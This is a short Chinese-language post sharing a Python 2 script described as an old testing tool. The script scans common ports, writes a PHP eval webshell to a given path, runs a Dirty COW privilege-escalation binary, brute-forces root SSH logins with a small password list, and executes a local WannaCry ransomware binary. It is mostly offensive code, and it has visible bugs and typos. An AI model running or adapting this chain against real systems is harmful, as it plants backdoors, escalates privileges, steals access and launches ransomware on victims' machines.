前言:
n久之前为测试写的脚本,都已经更新几个版本了。把最简单都版本放出来。
测试要求尽量少用第三方库。
# coding:utf-8
import socket
import sys
import os
import paramiko
# 扫描渗透溯源的端口
def scan_port(host):
ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389]
target_ip = socket.gethostbyname(host)
for port in ports:
print "port scanning is %s " % port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target_ip, port))
if result == 0:
print("open_port:" + port)
# 执行命令
def exec_system():
print(os.system('whoami'))
print(os.system('name -a'))
print(os.system('cat /proc/version'))
# 使用dirtycow提权
def get_root(path):
path = path + '/dirtycow'
os.system("chmod +x {}".format(path))
os.system("./{}".format(path))
# 生成脚本木马
def echo_webshell(path):
path = path + '/webshell.php'
with open(path, 'w') as f:
f.writelines("<?php @eval($_POST['cmd']);?>")
# 远程连接ssh
def ssh_connect(host):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
password = ['toor', 'admin123']
for pwd in password:
try:
ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5)
ssh.close()
print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
except paramiko.AuthenticationException, e:
pass
except socket.error, e:
pass
# 执行wannacry勒索脚本
def exec_wannacry(path):
path = path + '/wannacry'
os.system("chmod +x {}".format(path))
os.system("./{}".format(path))
if __name__ == '__main__':
if len(sys.argv) < 2:
print('argument error')
print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
exit(0)
host = sys.argv[2]
path = sys.argv[4]
scan_port(host)
echo_webshell(path)
get_root(path)
ssh_connect(host)
exec_wannacry(path)